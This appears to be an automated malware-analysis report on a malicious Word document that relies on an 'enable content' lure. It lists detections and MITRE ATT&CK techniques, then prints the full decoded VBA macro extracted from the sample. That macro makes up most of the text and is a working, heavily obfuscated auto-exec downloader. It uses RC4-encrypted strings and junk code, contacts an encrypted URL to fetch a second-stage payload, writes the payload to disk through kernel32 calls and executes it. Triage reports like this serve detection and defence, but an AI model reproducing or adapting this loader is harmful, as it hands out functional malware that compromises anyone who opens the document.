MALICIOUS
Risk Score: 320
Malware Insights
MITRE ATT&CK
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
- T1027 Obfuscated Files or Information
- T1204.002 Malicious File
The sample is an Office document containing a VBA macro that is heavily obfuscated and designed to execute automatically upon opening. The document body presents a 'protected document' lure, instructing the user to enable editing and content, which is a common tactic to bypass macro security. The VBA code utilizes CreateObject and appears to be a loader for a second-stage payload, as indicated by the critical heuristic firings for obfuscated auto-exec loaders and p-code execution.
Heuristics 10
- ClamAV: Doc.Malware.Chronos-6897935-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
- VBA project inside OOXML (medium, OOXML_VBA, 5 related findings): Document contains a VBA project; VBA macros present
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script:
  Set Dtcu3LFMUXYSae = CreateObject(LRnNiPV88Rq(QYmk("107C34828AF60452776717E22D5CE7FA19"), "PQdWE1"))
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
  Matched line in script:
  Set Dtcu3LFMUXYSae = CreateObject(LRnNiPV88Rq(QYmk("107C34828AF60452776717E22D5CE7FA19"), "PQdWE1"))
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro
  Matched line in script:
  Sub Document_Open()
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access)
  Matched line in script:
  PIPejz = Environ(LRnNiPV88Rq(QYmk("022F7855E4DF88"), "PC9ry5nETxy")) & "\" & MAYA9Ttqp & LRnNiPV88Rq(QYmk("8042ECBC"), "T7G2WMTxy")
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  Channel for the extracted URLs: In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15536 bytes |

SHA-256: ccd02143fb85219c6840c7926d7f59e3b9dbc04de46c9d1a965262355af274f6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
118 of 214 identifiers look randomly generated (e.g. 'B95BA117F4336D6AB000907F79B36F77C1ADF445'); 3 string-concatenation chain(s), consistent with name-mangling obfuscation.

Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function KIoFyyqDDpQCMw Lib "kernel32" Alias "_lcreat" (ByVal DnmC2Tum2Fdi As String, ByVal ATZftfS1vZ29Gl As Long) As Long
Private Declare PtrSafe Function J4GBRF1MBKoJoQj5 Lib "kernel32" Alias "_lwrite" (ByVal UF7kaK2y As Long, IifEjI5MA As Any, ByVal LkHm9tZlRI32h As Long) As Long
Private Declare PtrSafe Function OuW44m Lib "kernel32" Alias "_lclose" (ByVal IWwvFgZit As Long) As Long
#Else
Private Declare Function KIoFyyqDDpQCMw Lib "kernel32" Alias "_lcreat" (ByVal DnmC2Tum2Fdi As String, ByVal ATZftfS1vZ29Gl As Long) As Long
Private Declare Function OuW44m Lib "kernel32" Alias "_lclose" (ByVal IWwvFgZit As Long) As Long
Private Declare Function J4GBRF1MBKoJoQj5 Lib "kernel32" Alias "_lwrite" (ByVal UF7kaK2y As Long, IifEjI5MA As Any, ByVal LkHm9tZlRI32h As Long) As Long
#End If
Sub Document_Open()
Dim MaB14scvj1 As Long, SVOBv2aUdQRx7T4 As Long
MaB14scvj1 = 25
SVOBv2aUdQRx7T4 = 89
If MaB14scvj1 + SVOBv2aUdQRx7T4 > 2 Then
SVOBv2aUdQRx7T4 = MaB14scvj1 + 23
Else
SVOBv2aUdQRx7T4 = 95 + 4 + 53
End If
On Error Resume Next
Dim XRHEddANHBSYcpjR As Long, HQ5G0sAPY As Long
XRHEddANHBSYcpjR = 26
HQ5G0sAPY = 85
If XRHEddANHBSYcpjR + HQ5G0sAPY > 2 Then
HQ5G0sAPY = XRHEddANHBSYcpjR + 32
Else
HQ5G0sAPY = 66 + 17 + 67
End If
Dim YmmlU8OQ As Long, WrImQEkr As Long, Lkdr As Long
Dim W1zKDbl4l As Long, VT8pPQ0SxbE As Long
W1zKDbl4l = 75
VT8pPQ0SxbE = 37
If W1zKDbl4l + VT8pPQ0SxbE > 2 Then
VT8pPQ0SxbE = W1zKDbl4l + 54
Else
VT8pPQ0SxbE = 55 + 52 + 61
End If
YmmlU8OQ = 955492744: WrImQEkr = 0: Lkdr = 0
Dim B1tv5EZOSiaGh As Long, SgGv2GqQA9 As Long
B1tv5EZOSiaGh = 83
SgGv2GqQA9 = 39
If B1tv5EZOSiaGh + SgGv2GqQA9 > 2 Then
SgGv2GqQA9 = B1tv5EZOSiaGh + 47
Else
SgGv2GqQA9 = 74 + 94 + 34
End If
For WrImQEkr = 1 To YmmlU8OQ
Lkdr = Lkdr + 1
Next WrImQEkr
Dim G8k4eRxRpGJofVXm As Long, UYvPY4XIyc9LAMy As Long
G8k4eRxRpGJofVXm = 78
UYvPY4XIyc9LAMy = 67
If G8k4eRxRpGJofVXm + UYvPY4XIyc9LAMy > 2 Then
UYvPY4XIyc9LAMy = G8k4eRxRpGJofVXm + 2
Else
UYvPY4XIyc9LAMy = 96 + 40 + 82
End If
If Lkdr = YmmlU8OQ Then
Dim Vfdk3At As Long, BLZNRwk7FZYfKq As Long
Vfdk3At = 77
BLZNRwk7FZYfKq = 70
If Vfdk3At + BLZNRwk7FZYfKq > 2 Then
BLZNRwk7FZYfKq = Vfdk3At + 92
Else
BLZNRwk7FZYfKq = 25 + 53 + 68
End If
Dim Nu3zOiVX8T As Long, Cc9LAMykkhM As Long
Nu3zOiVX8T = 52
Cc9LAMykkhM = 71
If Nu3zOiVX8T + Cc9LAMykkhM > 2 Then
Cc9LAMykkhM = Nu3zOiVX8T + 61
Else
Cc9LAMykkhM = 18 + 48 + 84
End If
IQOC3Z
Dim F7DVXiTngHSggu3 As Long, YBjY As Long
F7DVXiTngHSggu3 = 53
YBjY = 68
If F7DVXiTngHSggu3 + YBjY > 2 Then
YBjY = F7DVXiTngHSggu3 + 71
Else
YBjY = 89 + 35 + 25
End If
Else
Dim JGDHIqplImNF As Long, PkkhMKgWyj As Long
JGDHIqplImNF = 23
PkkhMKgWyj = 60
If JGDHIqplImNF + PkkhMKgWyj > 2 Then
PkkhMKgWyj = JGDHIqplImNF + 49
Else
PkkhMKgWyj = 29 + 89 + 7
End If
MEZ88luYpUmX1J
Dim Sd1CeY9q3xJw8 As Long, VlA4x As Long
Sd1CeY9q3xJw8 = 60
VlA4x = 96
If Sd1CeY9q3xJw8 + VlA4x > 2 Then
VlA4x = Sd1CeY9q3xJw8 + 13
Else
VlA4x = 92 + 53 + 44
End If
End If
Dim ETiSwpkV8 As Long, FqUD4Z1MqIu4oL As Long
ETiSwpkV8 = 55
FqUD4Z1MqIu4oL = 65
If ETiSwpkV8 + FqUD4Z1MqIu4oL > 2 Then
FqUD4Z1MqIu4oL = ETiSwpkV8 + 80
Else
FqUD4Z1MqIu4oL = 60 + 21 + 39
End If
End Sub
Function QYmk(KuSwmJkmPIwq As String) As String
Dim UfJvbAN As Long, DorffyXxZm As Long
UfJvbAN = 58
DorffyXxZm = 3
If UfJvbAN + DorffyXxZm > 2 Then
DorffyXxZm = UfJvbAN + 21
Else
DorffyXxZm = 66 + 30 + 86
End If
Dim K6BGGvYl6U As Integer
Dim Pq8C As Long, QrG5Etj9lfJ As Long
Pq8C = 70
QrG5Etj9lfJ = 17
If Pq8C + QrG5Etj9lfJ > 2 Then
QrG5Etj9lfJ = Pq8C + 51
Else
QrG5Etj9lfJ = 74 + 52 + 47
End If
For K6BGGvYl6U = 1 To Len(KuSwmJkmPIwq) Step 2
QYmk = QYmk & Chr$(Val(Chr$(38) & Chr$(72) & Mid$(KuSwmJkmPIwq, K6BGGvYl6U, 2)))
Next
Dim OW0bVxbLxme As Long, PsHR3Kkm2p0A As Long
OW0bVxbLxme = 2
PsHR3Kkm2p0A = 86
If OW0bVxbLxme + PsHR3Kkm2p0A > 2 Then
PsHR3Kkm2p0A = OW0bVxbLxme + 79
Else
PsHR3Kkm2p0A = 2 + 34 + 62
End If
End Function
Sub MEZ88luYpUmX1J()
Dim MXlJRMaj9V As Long, YPH6nwiudOpqTUyRu As Long
MXlJRMaj9V = 58
YPH6nwiudOpqTUyRu = 92
If MXlJRMaj9V + YPH6nwiudOpqTUyRu > 2 Then
YPH6nwiudOpqTUyRu = MXlJRMaj9V + 16
Else
YPH6nwiudOpqTUyRu = 92 + 87 + 75
End If
App.LogEvent "J3F3bYZ8ZyXizNYB"
Hour 79
Sqr 80
JrXj7vltnOc = LCase(77)
FreeFile 86
If CDbl(31) = True Then YVodsEQdmWOMuL = 44
KKp1KyqesejHSv = Fix(58)
Command
PArPnlxlz7 = CVDate(17)
TmeztnFX7 = QBColor(42)
FV 40, 71, 78
DDB 83, 67, 16, 45
Log 31
Resume
If CCur(65) = True Then BHp0A = 6910
GetAllSettings 64, 73
App.StartLogging "C5kSULD", 92
Sin 60
If Abs(85) = 35 Then MYanRen = 3587
DatePart "KEyM5AN1dUBw6", 4
If IsMissing(28) = True Then FyL3wu8ALiFqDYM = 81
Randomize
LGpO48AB = EOF(20)
TimeValue 79
Year 26
InputBox 60, 11, 61, 82, 70
QMuqRwGgNtXQBI = UCase(6)
Atn 73
G9zYJYSX = Cos(10)
Round 18, 86
Dim Xhw7XNqeZsBMOjs As Long, BJjcPUZ5Q As Long
Xhw7XNqeZsBMOjs = 18
BJjcPUZ5Q = 13
If Xhw7XNqeZsBMOjs + BJjcPUZ5Q > 2 Then
BJjcPUZ5Q = Xhw7XNqeZsBMOjs + 1
Else
BJjcPUZ5Q = 36 + 30 + 74
End If
End Sub
Function MAYA9Ttqp() As String
Dim ChADsyA As Long, VTbGd9ZdvIVY As Long
ChADsyA = 29
VTbGd9ZdvIVY = 5
If ChADsyA + VTbGd9ZdvIVY > 2 Then
VTbGd9ZdvIVY = ChADsyA + 23
Else
VTbGd9ZdvIVY = 68 + 59 + 16
End If
Dim W7qcQl1755D409Yny() As Byte, XJYwuNp6mCxaiARE() As Byte, IWvy1VcHFg167ik8g As Long, F1C61dDvPVF As Long, GvFSSwihBCsmlT As String, CRAI5afc9 As String, DzUZI9fMYYWR65cM4 As Long
Dim RbBSb70Jv As Long, G8k0rbJdd6wjXx As Long
RbBSb70Jv = 57
G8k0rbJdd6wjXx = 93
If RbBSb70Jv + G8k0rbJdd6wjXx > 2 Then
G8k0rbJdd6wjXx = RbBSb70Jv + 10
Else
G8k0rbJdd6wjXx = 89 + 50 + 41
End If
DzUZI9fMYYWR65cM4 = 0
Dim IFOXGjnsjkXV As Long, IivxfQYR As Long
IFOXGjnsjkXV = 20
IivxfQYR = 31
If IFOXGjnsjkXV + IivxfQYR > 2 Then
IivxfQYR = IFOXGjnsjkXV + 46
Else
IivxfQYR = 26 + 86 + 5
End If
DpUmX1JQWa:
Dim UTv27 As Long, Aj0OxjzXN As Long
UTv27 = 78
Aj0OxjzXN = 30
If UTv27 + Aj0OxjzXN > 2 Then
Aj0OxjzXN = UTv27 + 2
Else
Aj0OxjzXN = 33 + 40 + 45
End If
Randomize
CRAI5afc9 = Int(30 * Rnd)
If CRAI5afc9 < 4 Then GoTo DpUmX1JQWa
DzUZI9fMYYWR65cM4 = CRAI5afc9
If DzUZI9fMYYWR65cM4 > 0& Then
Dim UN4tlQL As Long, YdaMPsTw As Long
UN4tlQL = 56
YdaMPsTw = 97
If UN4tlQL + YdaMPsTw > 2 Then
YdaMPsTw = UN4tlQL + 18
Else
YdaMPsTw = 37 + 27 + 83
End If
GvFSSwihBCsmlT = LRnNiPV88Rq(QYmk("9AA09A8695A94A8A4C0C"), "SAVio0tlP")
Randomize
W7qcQl1755D409Yny = GvFSSwihBCsmlT
IWvy1VcHFg167ik8g = Len(GvFSSwihBCsmlT) - 1&
DzUZI9fMYYWR65cM4 = (DzUZI9fMYYWR65cM4 * 2&) - 1&
ReDim XJYwuNp6mCxaiARE(DzUZI9fMYYWR65cM4) As Byte
Dim WyvCIEhqPkl1 As Long, Rug5Zwp6dTIh As Long
WyvCIEhqPkl1 = 27
Rug5Zwp6dTIh = 24
If WyvCIEhqPkl1 + Rug5Zwp6dTIh > 2 Then
Rug5Zwp6dTIh = WyvCIEhqPkl1 + 33
Else
Rug5Zwp6dTIh = 5 + 90 + 5
End If
For F1C61dDvPVF = 0& To DzUZI9fMYYWR65cM4 Step 2&
XJYwuNp6mCxaiARE(F1C61dDvPVF) = W7qcQl1755D409Yny(CLng(IWvy1VcHFg167ik8g * Rnd) * 2&)
Next
Dim DN7wVcbfbp As Long, IGT0t0lsH3le9aFHH As Long
DN7wVcbfbp = 60
IGT0t0lsH3le9aFHH = 70
If DN7wVcbfbp + IGT0t0lsH3le9aFHH > 2 Then
IGT0t0lsH3le9aFHH = DN7wVcbfbp + 41
Else
IGT0t0lsH3le9aFHH = 54 + 68 + 51
End If
End If
Dim JkmI62nq2AkUBzsRY As Long, F796jiT05 As Long
JkmI62nq2AkUBzsRY = 88
F796jiT05 = 86
If JkmI62nq2AkUBzsRY + F796jiT05 > 2 Then
F796jiT05 = JkmI62nq2AkUBzsRY + 18
Else
F796jiT05 = 25 + 30 + 14
End If
MAYA9Ttqp = XJYwuNp6mCxaiARE
Dim OUw1K1Yk1AI As Long, APp41c8e7BaBRH As Long
OUw1K1Yk1AI = 44
APp41c8e7BaBRH = 44
If OUw1K1Yk1AI + APp41c8e7BaBRH > 2 Then
APp41c8e7BaBRH = OUw1K1Yk1AI + 96
Else
APp41c8e7BaBRH = 14 + 37 + 91
End If
End Function
Function LRnNiPV88Rq(ByVal HTJg5RAL As String, ByVal PvXuooa6Q As String) As String
Dim CpEzb0Co6n As Long, O0PbG87wlOP7R As Long
CpEzb0Co6n = 79
O0PbG87wlOP7R = 12
If CpEzb0Co6n + O0PbG87wlOP7R > 2 Then
O0PbG87wlOP7R = CpEzb0Co6n + 41
Else
O0PbG87wlOP7R = 81 + 58 + 76
End If
On Error Resume Next
Dim AJyPmojem8Ev5HP As Long, YNDWb1fJ0Gb9QoHRu As Long
AJyPmojem8Ev5HP = 27
YNDWb1fJ0Gb9QoHRu = 95
If AJyPmojem8Ev5HP + YNDWb1fJ0Gb9QoHRu > 2 Then
YNDWb1fJ0Gb9QoHRu = AJyPmojem8Ev5HP + 17
Else
YNDWb1fJ0Gb9QoHRu = 28 + 21 + 43
End If
Dim HEf7AK1JYyt(0 To 255) As Integer, HKX4hVu As Long, UZkUHAWL As Long, SQjc7ICu As Long, JoVxkvpGIJS() As Byte, IcndGJ1Haqr0Mdjm2() As Byte, PYmfHnajj As Byte
Dim P87wlOP7RbEGLf As Long, DHFslWz3Rl As Long
P87wlOP7RbEGLf = 55
DHFslWz3Rl = 65
If P87wlOP7RbEGLf + DHFslWz3Rl > 2 Then
DHFslWz3Rl = P87wlOP7RbEGLf + 10
Else
DHFslWz3Rl = 23 + 36 + 94
End If
JoVxkvpGIJS() = StrConv(PvXuooa6Q, vbFromUnicode)
Dim I0kiQrXUGh8jgH As Long, DR831vgAw As Long
I0kiQrXUGh8jgH = 77
DR831vgAw = 46
If I0kiQrXUGh8jgH + DR831vgAw > 2 Then
DR831vgAw = I0kiQrXUGh8jgH + 12
Else
DR831vgAw = 16 + 55 + 11
End If
For HKX4hVu = 0 To 255
HEf7AK1JYyt(HKX4hVu) = HKX4hVu
Next HKX4hVu
HKX4hVu = 0
UZkUHAWL = 0
SQjc7ICu = 0
For HKX4hVu = 0 To 255
UZkUHAWL = (UZkUHAWL + HEf7AK1JYyt(HKX4hVu) + JoVxkvpGIJS(HKX4hVu Mod Len(PvXuooa6Q))) Mod 256
PYmfHnajj = HEf7AK1JYyt(HKX4hVu)
HEf7AK1JYyt(HKX4hVu) = HEf7AK1JYyt(UZkUHAWL)
HEf7AK1JYyt(UZkUHAWL) = PYmfHnajj
Next HKX4hVu
HKX4hVu = 0
UZkUHAWL = 0
SQjc7ICu = 0
IcndGJ1Haqr0Mdjm2() = StrConv(HTJg5RAL, vbFromUnicode)
For HKX4hVu = 0 To Len(HTJg5RAL)
UZkUHAWL = (UZkUHAWL + 1) Mod 256
SQjc7ICu = (SQjc7ICu + HEf7AK1JYyt(UZkUHAWL)) Mod 256
PYmfHnajj = HEf7AK1JYyt(UZkUHAWL)
HEf7AK1JYyt(UZkUHAWL) = HEf7AK1JYyt(SQjc7ICu)
HEf7AK1JYyt(SQjc7ICu) = PYmfHnajj
IcndGJ1Haqr0Mdjm2(HKX4hVu) = IcndGJ1Haqr0Mdjm2(HKX4hVu) Xor (HEf7AK1JYyt((HEf7AK1JYyt(UZkUHAWL) + HEf7AK1JYyt(SQjc7ICu)) Mod 256))
Next HKX4hVu
Dim Lm5faFiviTJzL0z As Long, CFPmJoQwD As Long
Lm5faFiviTJzL0z = 28
CFPmJoQwD = 29
If Lm5faFiviTJzL0z + CFPmJoQwD > 2 Then
CFPmJoQwD = Lm5faFiviTJzL0z + 26
Else
CFPmJoQwD = 36 + 7 + 20
End If
LRnNiPV88Rq = StrConv(IcndGJ1Haqr0Mdjm2, vbUnicode)
Dim VVTXeuz5PW As Long, H3vwNHw1H2 As Long
VVTXeuz5PW = 56
H3vwNHw1H2 = 46
If VVTXeuz5PW + H3vwNHw1H2 > 2 Then
H3vwNHw1H2 = VVTXeuz5PW + 3
Else
H3vwNHw1H2 = 33 + 68 + 8
End If
End Function
Sub IQOC3Z()
Dim PEuDRnFTCkvBVsi As Long, FEm3u0JE8Nyfm As Long
PEuDRnFTCkvBVsi = 36
FEm3u0JE8Nyfm = 71
If PEuDRnFTCkvBVsi + FEm3u0JE8Nyfm > 2 Then
FEm3u0JE8Nyfm = PEuDRnFTCkvBVsi + 65
Else
FEm3u0JE8Nyfm = 9 + 51 + 98
End If
Dim PIPejz As String, Dtcu3LFMUXYSae As Object
Dim IpisXAfQlak As Long, XT0mICcmBlItf3 As Long
IpisXAfQlak = 89
XT0mICcmBlItf3 = 84
If IpisXAfQlak + XT0mICcmBlItf3 > 2 Then
XT0mICcmBlItf3 = IpisXAfQlak + 72
Else
XT0mICcmBlItf3 = 8 + 2 + 46
End If
PIPejz = Environ(LRnNiPV88Rq(QYmk("022F7855E4DF88"), "PC9ry5nETxy")) & "\" & MAYA9Ttqp & LRnNiPV88Rq(QYmk("8042ECBC"), "T7G2WMTxy")
Dim BFfuO0mJALyMLC As Long, P8NfMYMEQHpp As Long
BFfuO0mJALyMLC = 27
P8NfMYMEQHpp = 72
If BFfuO0mJALyMLC + P8NfMYMEQHpp > 2 Then
P8NfMYMEQHpp = BFfuO0mJALyMLC + 62
Else
P8NfMYMEQHpp = 19 + 23 + 85
End If
Set Dtcu3LFMUXYSae = CreateObject(LRnNiPV88Rq(QYmk("107C34828AF60452776717E22D5CE7FA19"), "PQdWE1"))
Dim U7TKtRz1 As Long, Vgb7Bhjn As Long
U7TKtRz1 = 86
Vgb7Bhjn = 93
If U7TKtRz1 + Vgb7Bhjn > 2 Then
Vgb7Bhjn = U7TKtRz1 + 44
Else
Vgb7Bhjn = 21 + 16 + 5
End If
Dtcu3LFMUXYSae.Open LRnNiPV88Rq(QYmk("776E05"), "NMUNTECAc"), LRnNiPV88Rq(QYmk("418B95BA117F4336D6AB000907F79B36F77C1ADF445AB13C099211"), "Ic5tp7VhfU"), False
Dim WtAxz8aTF6JqGas As Long, QiDpp As Long
WtAxz8aTF6JqGas = 97
QiDpp = 34
If WtAxz8aTF6JqGas + QiDpp > 2 Then
QiDpp = WtAxz8aTF6JqGas + 50
Else
QiDpp = 30 + 90 + 81
End If
Dtcu3LFMUXYSae.setRequestHeader LRnNiPV88Rq(QYmk("5E260FC785336E7441B6"), "VbayGiNVCcs58tA6e"), LRnNiPV88Rq(QYmk("0B6782D6862B22045A10E2"), "BiBKRvlNIhab8T")
Dtcu3LFMUXYSae.send
If Dtcu3LFMUXYSae.readyState = 4 And Dtcu3LFMUXYSae.Status = 200 Then
Dim UajY As Long, TNzOFRr As Long
UajY = 84
TNzOFRr = 25
If UajY + TNzOFRr > 2 Then
TNzOFRr = UajY + 51
Else
TNzOFRr = 26 + 52 + 95
End If
YBzgAFu09E9pbFA PIPejz, LRnNiPV88Rq(StrConv(Dtcu3LFMUXYSae.ResponseBody, vbUnicode), LRnNiPV88Rq(QYmk("5B548A693199A1DB7B"), "VU9mbc5L0"))
Dim IwuqFMfk As Long, RBnig7Bd As Long
IwuqFMfk = 27
RBnig7Bd = 59
If IwuqFMfk + RBnig7Bd > 2 Then
RBnig7Bd = IwuqFMfk + 11
Else
RBnig7Bd = 10 + 40 + 21
End If
POu2LPdA 1
Dim WHk5Kbjdsfj As Long, DyWO60b As Long
WHk5Kbjdsfj = 27
DyWO60b = 7
If WHk5Kbjdsfj + DyWO60b > 2 Then
DyWO60b = WHk5Kbjdsfj + 67
Else
DyWO60b = 85 + 86 + 82
End If
CreateObject(LRnNiPV88Rq(QYmk("4349CAA4295D35032FFB81C1DD"), "MAm6l7wxtuJt")).exec """" & PIPejz & """"
Dim ABnig7Bd As Long, JEU1nf0myzb As Long
ABnig7Bd = 34
JEU1nf0myzb = 12
If ABnig7Bd + JEU1nf0myzb > 2 Then
JEU1nf0myzb = ABnig7Bd + 52
Else
JEU1nf0myzb = 33 + 16 + 42
End If
End If
Dim HOaAFi As Long, OGNqsP As Long
HOaAFi = 2
OGNqsP = 11
If HOaAFi + OGNqsP > 2 Then
OGNqsP = HOaAFi + 37
Else
OGNqsP = 30 + 97 + 23
End If
Set Dtcu3LFMUXYSae = Nothing
Dim HZSDZpR5z As Long, VzA7aBVeU02x4N06 As Long
HZSDZpR5z = 52
VzA7aBVeU02x4N06 = 58
If HZSDZpR5z + VzA7aBVeU02x4N06 > 2 Then
VzA7aBVeU02x4N06 = HZSDZpR5z + 42
Else
VzA7aBVeU02x4N06 = 89 + 45 + 5
End If
End Sub
Sub POu2LPdA(OY0nedJWb0 As Long)
Dim YL8zIdaJ As Long, CzR3B5XxI0PShI As Long
YL8zIdaJ = 2
CzR3B5XxI0PShI = 95
If YL8zIdaJ + CzR3B5XxI0PShI > 2 Then
CzR3B5XxI0PShI = YL8zIdaJ + 40
Else
CzR3B5XxI0PShI = 9 + 29 + 40
End If
Dim EXsq2t As Long
Dim ONlXAHWBVK As Long, TQFLEyWneibv As Long
ONlXAHWBVK = 12
TQFLEyWneibv = 20
If ONlXAHWBVK + TQFLEyWneibv > 2 Then
TQFLEyWneibv = ONlXAHWBVK + 69
Else
TQFLEyWneibv = 20 + 41 + 30
End If
EXsq2t = Timer + OY0nedJWb0
Do While Timer < EXsq2t
DoEvents
Loop
Dim G8L8z As Long, LIn3rq2itr As Long
G8L8z = 78
LIn3rq2itr = 66
If G8L8z + LIn3rq2itr > 2 Then
LIn3rq2itr = G8L8z + 2
Else
LIn3rq2itr = 95 + 40 + 9
End If
End Sub
Function YBzgAFu09E9pbFA(T4OKy2XuOs As String, T582uRVQPNARgwe As String)
Dim EjTdrGHOVFY As Long, Sh334QnLsnviJECLE As Long
EjTdrGHOVFY = 32
Sh334QnLsnviJECLE = 31
If EjTdrGHOVFY + Sh334QnLsnviJECLE > 2 Then
Sh334QnLsnviJECLE = EjTdrGHOVFY + 61
Else
Sh334QnLsnviJECLE = 68 + 74 + 58
End If
Dim CPfgD2h3uL As Long
Dim MKiPQ4B4Scq7 As Long, DAUUoGKrlQJRQFZjV As Long
MKiPQ4B4Scq7 = 43
DAUUoGKrlQJRQFZjV = 98
If MKiPQ4B4Scq7 + DAUUoGKrlQJRQFZjV > 2 Then
DAUUoGKrlQJRQFZjV = MKiPQ4B4Scq7 + 58
Else
DAUUoGKrlQJRQFZjV = 27 + 19 + 96
End If
CPfgD2h3uL = KIoFyyqDDpQCMw(T4OKy2XuOs, 128)
Dim TR6dlb3hw5yZDhsW As Long, THD0XHDrHxgEeY5 As Long
TR6dlb3hw5yZDhsW = 6
THD0XHDrHxgEeY5 = 35
If TR6dlb3hw5yZDhsW + THD0XHDrHxgEeY5 > 2 Then
THD0XHDrHxgEeY5 = TR6dlb3hw5yZDhsW + 21
Else
THD0XHDrHxgEeY5 = 90 + 56 + 60
End If
J4GBRF1MBKoJoQj5 CPfgD2h3uL, ByVal T582uRVQPNARgwe, Len(T582uRVQPNARgwe)
Dim JnjaEVGirv As Long, Q13Obwv6ALtL As Long
JnjaEVGirv = 77
Q13Obwv6ALtL = 57
If JnjaEVGirv + Q13Obwv6ALtL > 2 Then
Q13Obwv6ALtL = JnjaEVGirv + 18
Else
Q13Obwv6ALtL = 35 + 36 + 33
End If
OuW44m CPfgD2h3uL
Dim LYcxr6Oa9WbGMn As Long, HkRFebkLGLiC As Long
LYcxr6Oa9WbGMn = 18
HkRFebkLGLiC = 63
If LYcxr6Oa9WbGMn + HkRFebkLGLiC > 2 Then
HkRFebkLGLiC = LYcxr6Oa9WbGMn + 27
Else
HkRFebkLGLiC = 83 + 14 + 76
End If
End Function

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 38400 bytes |

SHA-256: eded62f7fe53ddafc011ce9b7c8eaa4fe4e8039e939bfa279ea405536fb65d61
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: unlikely